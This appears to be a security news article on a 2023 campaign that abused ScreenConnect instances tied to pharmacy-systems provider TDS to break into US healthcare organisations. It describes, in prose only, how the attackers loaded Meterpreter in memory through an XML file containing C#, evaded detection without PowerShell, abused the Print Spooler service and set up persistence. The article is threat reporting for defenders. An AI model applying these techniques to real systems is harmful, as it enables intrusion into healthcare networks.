HQ/EMEAFind out how we can help your business
Hackers using ScreenConnect exploits for remote access cause cyberattacks targeting multiple healthcare organisations across the United States. Based on reports, the threat actors recently leveraged the remote access tool to compromise various healthcare institutions.
The targeted assaults focus on ScreenConnect instances utilised by Transaction Data Systems (TDS), a nationwide provider of integrated pharmacy supply chain and management systems in every state across the United States.
Researchers first identified the breaches after detecting unusual activity on endpoints within two distinct healthcare organisations, raising concerns about a broader, larger-scale threat.
The threat actor took several steps based on reports, including installing additional remote access tools, such as ScreenConnect or AnyDesk instances, to establish persistent access to the targeted environments.
The ScreenConnect exploits started late last month up to the early days of November.
The ScreenConnect exploits against healthcare companies between October 28 and November 8, 2023, are ongoing, highlighting the persistence and adaptability of the threat actors.
The researchers noted that the threat operators employed similar TTPs across all identified incidents. The common tactics for these attacks included downloading a payload named text.xml. This detail indicates that only a single threat group manages these campaigns.
The attacks use the .XML file containing C# code that loads the Metasploit attack payload Meterpreter into the system memory, strategically avoiding detection using non-PowerShell methods. In addition, researchers noticed that the attackers had exploited the Printer Spooler service to launch additional processes.
Consequently, the compromised endpoints, operating on a Windows Server 2019 system, were associated with two distinct organisations—one in the pharmaceutical sector and another in healthcare.
Furthermore, the attackers use the remote access tool to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers even tried to generate a new user account for persistent access.
Researchers traced the ScreenConnect instance back to the ‘rs.tdsclinical[.]com’ domain linked to TDS, raising questions about whether TDS itself suffered a breach or if the attackers exploited compromised credentials or an alternative mechanism.
These revelations emphasise that organisations, especially the healthcare sector, should urgently need enhanced cybersecurity measures to safeguard sensitive patient data and critical infrastructure.
